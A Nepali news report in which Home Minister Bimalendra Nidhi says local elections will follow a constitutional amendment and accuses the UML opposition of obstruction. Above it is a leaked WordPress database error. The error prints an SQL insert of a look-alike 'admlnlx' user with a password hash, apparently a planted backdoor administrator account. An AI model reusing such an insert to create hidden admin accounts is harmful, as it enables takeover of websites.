WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BKoIiYVVhye5q2c8MUEDU2TzlAL8V8/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 15:54:37', '', 'admlnlx', 'admlnlx')
नवलपरासी, माघ २८ –
उपप्रधान् तथा गृहमन्त्री बिमलेन्द्र निधिले सरकारले संबिधान संशोधनपछिमात्र स्थानीय तहको निर्बाचन घोषणा गर्ने बताएका छन्।
रिपोर्टर्स क्लब नेपाल नवलपरासी शाखाले आज परासीमा आयोजना गरेको पत्रकार सम्मेलनमा बोल्दै निधिले एमालेले खोक्रो राष्ट्रबादको कुरा गरेर देशलाई बन्धक बनाएको आरोप लगाए।
प्रमुख प्रतिपक्षी दल एमालेसंग बार्ता छलफल गरी सिमांकन लगायतका सबै समस्या समाधान गरेर सरकार देशलाई निकास दिन लागिपरेको उनको भनाई थियो।
मन्त्री निधिले एमालेको रबैयाको कारण मधेशी मोर्चा बेखुस भएको बताउँदै मोर्चा र एमालेको सम्वाद शुरु भएको र संबाद सकारात्मक भएकाले संबिधान सशोधनको प्रस्ताव सफल हुनेमा आफु विश्वस्त रहेको बताए।
कांग्रेसका नेता समेत रहेका मन्त्री निधिले स्थानीय तह वा निकायको जुनसुकै चुनाव भए पनि कांग्रेसलाई आपत्ति नभएको जिकिर गरे। मुलुकलाई खिण्डन गर्न खोज्ने जो सुकैलाई संबिधानले दिएको परीधिभित्र रहेर कारबाही गरिने निधिको भनाई थियो।
आजै मन्त्री निधिले उद्योग बाणिज्य संघ नवलपरासीको ३५ औं साधारण सभाको उद्घाटन गर्नुका साथै कार्यालय प्रमुखहरुलाई पनि निर्देशन दिएका थिए ।